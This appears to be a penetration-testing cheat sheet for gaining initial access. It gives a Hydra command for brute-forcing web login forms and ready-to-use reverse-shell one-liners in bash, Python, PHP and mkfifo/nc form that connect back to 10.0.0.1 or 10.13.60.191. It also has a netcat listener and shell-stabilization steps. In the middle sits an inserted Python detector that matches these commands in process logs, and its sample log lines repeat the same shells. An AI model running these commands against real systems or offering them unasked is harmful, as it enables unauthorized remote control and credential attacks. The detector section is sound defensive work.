Initial Access

Hydra

Post method example:

hydra -l <username> -P <password list> <target URL> http-post-form "/<login URI>:<login form data>:<error message>"

Reverse Shell

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'

rm -f /tmp/a; mkfifo /tmp/a; nc 10.13.60.191 4444 0</tmp/a | /bin/sh >/tmp/a 2>&1; rm /tmp/a

* Cheat Sheet
* PHP Reverse Shell

Listener:

nc -lvnp 4444
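
A defender's view of the one-liners above, as an added example that is not part of the original page: a Python matcher that flags their command-line shapes in process-creation logs. The log format, the rule names and the sample lines (which use 192.0.2.0/24 documentation addresses) are constructed assumptions.

```python
import re

# Rules keyed to the command shapes listed under "Reverse Shell" and "Shell Stabilization".
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+")),
    ("python_socket_pty", re.compile(r"python[\d.]*\s+-c\b.*socket.*(?:dup2|pty\.spawn)")),
    ("php_fsockopen_exec", re.compile(r"php\s+-r\b.*fsockopen\(.*(?:exec|system|passthru)\(")),
    # Backreference \1 requires the shell's output to go back into the same FIFO.
    ("mkfifo_nc_pipe", re.compile(
        r"mkfifo\s+([^\s;]+).*\bn(?:c|cat)\b.*\|\s*/bin/(?:ba)?sh\b.*>\s*\1")),
    ("pty_spawn_shell", re.compile(r"pty\.spawn\(\s*[\"']/bin/(?:ba)?sh")),
]

# Assumed (hypothetical) process-creation log format: pid=<n> user=<name> cmd=<command line>
LOG_RE = re.compile(r"^pid=(?P<pid>\d+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")

# Constructed sample lines; the last three are benign look-alikes.
SAMPLE_LOG = r"""
pid=4312 user=www-data cmd=bash -i >& /dev/tcp/192.0.2.7/4242 0>&1
pid=4313 user=www-data cmd=python -c 'import socket,os,pty;s=socket.socket();s.connect(("192.0.2.7",4242));os.dup2(s.fileno(),0);pty.spawn("/bin/sh")'
pid=4314 user=www-data cmd=php -r '$sock=fsockopen("192.0.2.7",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
pid=4315 user=www-data cmd=rm -f /tmp/a; mkfifo /tmp/a; nc 192.0.2.7 4444 0</tmp/a | /bin/sh >/tmp/a 2>&1; rm /tmp/a
pid=4316 user=www-data cmd=python -c 'import pty;pty.spawn("/bin/bash")'
pid=5001 user=deploy cmd=nc -zv 192.0.2.10 443
pid=5002 user=deploy cmd=python3 -c 'import socket; print(socket.gethostname())'
pid=5003 user=deploy cmd=mkfifo /tmp/q; cat /tmp/q
""".strip().splitlines()


def classify(cmdline):
    """Return the names of every rule the command line matches, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(lines):
    """Return (pid, user, rule names) for each parsable line that matches a rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (rules := classify(m["cmd"])):
            hits.append((int(m["pid"]), m["user"], rules))
    return hits


if __name__ == "__main__":
    for pid, user, rules in scan(SAMPLE_LOG):
        print(f"ALERT pid={pid} user={user} rules={','.join(rules)}")
```

Command-line matching only catches these literal shapes; a shell process whose standard input and output are a network socket is the more durable signal to alert on.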

Shell Stabilization

Option 1

python -c 'import pty;pty.spawn("/bin/bash")'

Option 2

Press Ctrl + Z to suspend the listener session, then run:

stty raw -echo && fg

Option 3

rlwrap nc -lvnp 4444